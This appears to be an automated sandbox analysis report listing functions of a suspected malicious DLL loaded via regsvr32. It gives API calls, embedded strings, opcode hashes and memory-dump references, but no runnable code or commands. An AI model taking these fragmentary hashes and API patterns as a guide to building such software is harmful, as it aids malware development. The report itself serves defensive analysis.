Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseConnectErrorHandleLast
String ID:
API String ID: 1311304170-0
Opcode ID: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
Instruction ID: 0158f42d9ff77c23bb17b3e7ed4d952bcdb7713165a4701ea335e42c4cb0ff2b
Opcode Fuzzy Hash: 62952b3b0ea731a52ba3ec55b09d3b976416c0f1d36efe0620873190e67255c5
Instruction Fuzzy Hash: 7A81A2B2A18B8692EB10CF55E144B697364FB84B84F844139DB8E97BA4DFBCF548C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA4850, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 221UNIQUE

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI ref: 00007FF983DA4B6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BE2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BE8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BEE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BF4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA4BFA

Strings

2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4, xrefs: 00007FF983DA4896

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExistsFilePath
String ID: 2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4
API String ID: 1784296113-4103206974
Opcode ID: f925b9cf7aa9d4eb31493bf1343f0fbf641fd16e957abffaf829a827274d5a9b
Instruction ID: 85e67ecc7a0bfe15dae5af6cc59afefd13c1d93960b2e3eb44cc1511eb8884ac
Opcode Fuzzy Hash: f925b9cf7aa9d4eb31493bf1343f0fbf641fd16e957abffaf829a827274d5a9b
Instruction Fuzzy Hash: BEA188A2B1878181EB00DBA4D5857AD2375FB447A4F845239DA5D67BEADFBCF085C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DCBD44, Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 480UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DCBD79

Strings

f, xrefs: 00007FF983DCBE6E
p, xrefs: 00007FF983DCBE76
p, xrefs: 00007FF983DCBDFE

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: 96265779a74d23ee4f786bbc3fc76276f1c1c8c7f57204478137a464cfd8e5d3
Instruction ID: 053f3a01ea507fe05ae357d12d2c412052e27a1af5f505f4bd4fa9add589164a
Opcode Fuzzy Hash: 96265779a74d23ee4f786bbc3fc76276f1c1c8c7f57204478137a464cfd8e5d3
Instruction Fuzzy Hash: 3512A2A1A2814285FB20DAB59054B79B291FB40760FDC4139E79BA77D4CBBCF59BCB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD4110, Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD4546

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7d3a1680c31bdb7de5cbb8a2c8d8483a96df4d4faee7dc13bf721ef28b18e177
Instruction ID: 7270dfeb59be2901b4876cd8903de1c95c06ecb7b525e64acc2b6544a06943cf
Opcode Fuzzy Hash: 7d3a1680c31bdb7de5cbb8a2c8d8483a96df4d4faee7dc13bf721ef28b18e177
Instruction Fuzzy Hash: 03C1B6A2A1864252E6A1DBA59440BBD7664FB41B80FCD0139DA4FA7796CFBCF45AC300

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DBDAC8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderUNIQUELIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF983DBDB4B
GetLastError.KERNEL32 ref: 00007FF983DBDB59
LoadLibraryExW.KERNEL32 ref: 00007FF983DBDB83
FreeLibrary.KERNEL32 ref: 00007FF983DBDBC9
GetProcAddress.KERNEL32 ref: 00007FF983DBDBD5

Strings

api-ms-, xrefs: 00007FF983DBDB6B

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
Instruction ID: 9619abb2863cade10ccc46b94dbb7acf43f318df08a48777b20293e64db39781
Opcode Fuzzy Hash: d713b68e8c60dd4c067ce1d1295b3b36c6977fd0372db4fecd4fbe35366fa0a0
Instruction Fuzzy Hash: 94318565A1AA4195EE12DF92A800B7523A4BF48B90F9D4539DD1EAB390DFFCF449C304

Uniqueness

Uniqueness Score: 23.02%

Function 00007FF983D93E30, Relevance: 9.1, APIs: 6, Instructions: 138fileUNIQUE

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93EC5
ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93EE2
ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93F4E
ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93F88
CloseHandle.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93F9A

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileRead$CloseHandle
String ID:
API String ID: 1447241488-0
Opcode ID: cea947035d5da50d5a08a5e159c4dea3f3bc1cd775c274a9c44751817637697c
Instruction ID: 10a1307f32e52116614d04c91e08cf1e7baaf95fc1ac4441ae478784757fec99
Opcode Fuzzy Hash: cea947035d5da50d5a08a5e159c4dea3f3bc1cd775c274a9c44751817637697c
Instruction Fuzzy Hash: DE518BB2604B8196EB24DF16E444BAA73A0F749B90F840239DF9E97BA5CF7DE154C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB53D0, Relevance: 9.1, APIs: 6, Instructions: 95fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32 ref: 00007FF983DB543F
MapViewOfFile.KERNEL32 ref: 00007FF983DB5463
CloseHandle.KERNEL32 ref: 00007FF983DB5474
UnmapViewOfFile.KERNEL32 ref: 00007FF983DB54B7
CloseHandle.KERNEL32 ref: 00007FF983DB54C1
WriteFile.KERNEL32 ref: 00007FF983DB5508

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingUnmapWrite
String ID:
API String ID: 2825254369-0
Opcode ID: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
Instruction ID: 7b7ed621034546ae8fe700a84a243379b40d960b005fd992fed143a3d6192e3c
Opcode Fuzzy Hash: 0f841c4d75cbbbbfb0e524c01365c58ca16adf2a6ed010f2494a28141108e93d
Instruction Fuzzy Hash: A131B3B2714A4186EB50CF66E810A2D77A1FB88B94B994138DE4F97B54DF3CE809CB00

Uniqueness

Uniqueness Score: 10.55%

Function 00007FF983DBBFD8, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 322UNIQUELIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF983DBC17B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF983DBC4AD

Strings

csm, xrefs: 00007FF983DBC1A2
csm, xrefs: 00007FF983DBC124
csm, xrefs: 00007FF983DBC0C2

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 8f5fb88e19f09e891755cc34d9c09c28d9da866de10edde2dc5b90626e53bdad
Instruction ID: 15a71e17ee9f72841a79012ec9184134882edb08a632682d9b6b1680982bb92a
Opcode Fuzzy Hash: 8f5fb88e19f09e891755cc34d9c09c28d9da866de10edde2dc5b90626e53bdad
Instruction Fuzzy Hash: 57E1B7B2A086818AE710DFB4D4407BD3BA4FB45748F994139DA8EAB655CF7CF58AC700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D910D0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107UNIQUE

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00007FF983D91124
GetVolumeInformationW.KERNEL32 ref: 00007FF983D91179
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9120E

Strings

:, xrefs: 00007FF983D9114A
%08x, xrefs: 00007FF983D91197

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationVolumeWindows_invalid_parameter_noinfo_noreturn
String ID: %08x$:
API String ID: 2791136463-521886738
Opcode ID: 1927aa9b70cdef16a7e46721eaff72b9ab61702ff506970b605c501a55f200f0
Instruction ID: 9815646313d56039358a814d15ff9585622b99eac1fbf39ee59b2bd4639d9a55
Opcode Fuzzy Hash: 1927aa9b70cdef16a7e46721eaff72b9ab61702ff506970b605c501a55f200f0
Instruction Fuzzy Hash: 9841A5B26187C182EB10CBA5F44576EB3A1FB94784F84513ADA8D97B99DFBCE144C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DDEB28, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48UNIQUE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF983DDEB59
GetLastError.KERNEL32 ref: 00007FF983DDEB65
CloseHandle.KERNEL32 ref: 00007FF983DDEB7D
WriteConsoleW.KERNEL32 ref: 00007FF983DDEBC7

Strings

CONOUT$, xrefs: 00007FF983DDEB89

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseErrorHandleLast
String ID: CONOUT$
API String ID: 2157184327-3130406586
Opcode ID: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
Instruction ID: 067f71680d04afb4508a4199dacc69e2f0caf451504c0cdc3c2d93bee33d5e00
Opcode Fuzzy Hash: 28f2fa734d7ccc3dddc565c47868e86e43f984ec65021d028519876cc06df68c
Instruction Fuzzy Hash: 6611B462618A4186E751DB96F85473577A0FB88BE1F890238D95ED3B94CFBCE918CB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DCFF04, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderUNIQUE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF983DCFF20
GetProcAddress.KERNEL32 ref: 00007FF983DCFF36
FreeLibrary.KERNEL32 ref: 00007FF983DCFF53

Strings

CorExitProcess, xrefs: 00007FF983DCFF2F
mscoree.dll, xrefs: 00007FF983DCFF17

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6742bacbe83848064711b71b8582e27c51499afce27943f895093a7b44629738
Instruction ID: c2d36cabcae9ce411ca3e31ff6c2b58f831833e9c1bd06329c81393863980b77
Opcode Fuzzy Hash: 6742bacbe83848064711b71b8582e27c51499afce27943f895093a7b44629738
Instruction Fuzzy Hash: 74F03AA2B2964281EF58CBA1E480BB82B60FF48745F8D143DE54F96264CFACF58DC700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D99C60, Relevance: 7.7, APIs: 5, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF983D93630: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D93715
Part of subcall function 00007FF983D93630: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D9371B

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99E55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99E5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99E61
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99E67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99FD0

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
Instruction ID: c8ac2e1297f590838f29fc52d49ac364fbb5b4479f745420207ea664551aa861
Opcode Fuzzy Hash: 49e10ca27ae9f0807598c193127893af1a13b6e757e9e96599b6ecf55619f3d7
Instruction Fuzzy Hash: 629191B260578181EB04DF65E488B6D63A6FB45F88FC84039DB4E5BA59DFBCE498C340

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983DB5530, Relevance: 7.6, APIs: 5, Instructions: 80timeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF983DB5593
SetFilePointer.KERNEL32 ref: 00007FF983DB55C6
GetLocalTime.KERNEL32 ref: 00007FF983DB5618
SystemTimeToFileTime.KERNEL32 ref: 00007FF983DB5628
FileTimeToDosDateTime.KERNEL32 ref: 00007FF983DB563D

Part of subcall function 00007FF983DB5100: GetFileType.KERNEL32 ref: 00007FF983DB5134

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileTime$Type$DateLocalPointerSystem
String ID:
API String ID: 60630809-0
Opcode ID: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
Instruction ID: 8fe120f2adce9b62a3dcc77b3c6155999c40123cbcd31e7f3fb6159e470a418d
Opcode Fuzzy Hash: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
Instruction Fuzzy Hash: C1317E72618B81C6D740CF69E44076D37A5FB48B94FA40139EA8E87BA8EF7DD44AC740

Uniqueness

Uniqueness Score: 6.12%

Function 00007FF983DDD128, Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF983DDD150
_set_statfp.LIBCMT ref: 00007FF983DDD16B
_set_statfp.LIBCMT ref: 00007FF983DDD187
_set_statfp.LIBCMT ref: 00007FF983DDD1C3

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
Instruction ID: c07b8cbbc859ce54678ed82641d0bb760a57ae88c295cba98ad9a09310113452
Opcode Fuzzy Hash: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
Instruction Fuzzy Hash: 481160E2E58A1203FA6499A8D851B753240BF55360F8D063CE96FEA2D6CEEC788DC110

Uniqueness

Uniqueness Score: 0.74%

Function 00007FF983DBBA20, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF983DBBA3F
SetLastError.KERNEL32 ref: 00007FF983DBBAC6

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
Instruction ID: 2785ebd2132679ee6fc58ea4334f72a464e287ab9aaeb1466b03f04d5eb86efc
Opcode Fuzzy Hash: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
Instruction Fuzzy Hash: F51139A0E1924282F954DB619910B392655BF44790F9C463CDD2FEB7D6DEECF449CB00

Uniqueness

Uniqueness Score: 0.29%

Function 00007FF983DD33E8, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD36C4

Part of subcall function 00007FF983DDBAA4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDBAC1

Strings

UTF-16LEUNICODE, xrefs: 00007FF983DD3662
UTF-8, xrefs: 00007FF983DD3643
ccs, xrefs: 00007FF983DD35FF

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 2a21a7119c3abbc62120d6b20015d757fb432afc87c57eb727d89c84f3e64afb
Instruction ID: 28309b09c17fc70831cf276e2bb88795fdf40ae17202dfeb0bf4423d73b5cdac
Opcode Fuzzy Hash: 2a21a7119c3abbc62120d6b20015d757fb432afc87c57eb727d89c84f3e64afb
Instruction Fuzzy Hash: 3A815EE3D0825287FF76CEA58150B7836A0BB11B44FDD8039DA0BE7285CAADF949D701

Uniqueness

Uniqueness Score: 4.01%

Function 00007FF983DBC4E8, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190UNIQUELIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL ref: 00007FF983DBC558
_CallSETranslator.LIBVCRUNTIME ref: 00007FF983DBC5A3

Strings

RCC, xrefs: 00007FF983DBC574
MOC, xrefs: 00007FF983DBC56C

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
Instruction ID: bde9f17f088841eee22999a6b0707a49c3d1a0f4b6a23d1c79df12133383e6b4
Opcode Fuzzy Hash: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
Instruction Fuzzy Hash: BB9192B3A087818AE710CBA4E4407AD7BA4F744788F54452EEE8E6B755DF7CE19AC700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D98550, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162UNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB5F8
Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB6AF

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D98774
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9877A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D98780

Strings

890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f, xrefs: 00007FF983D9859D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
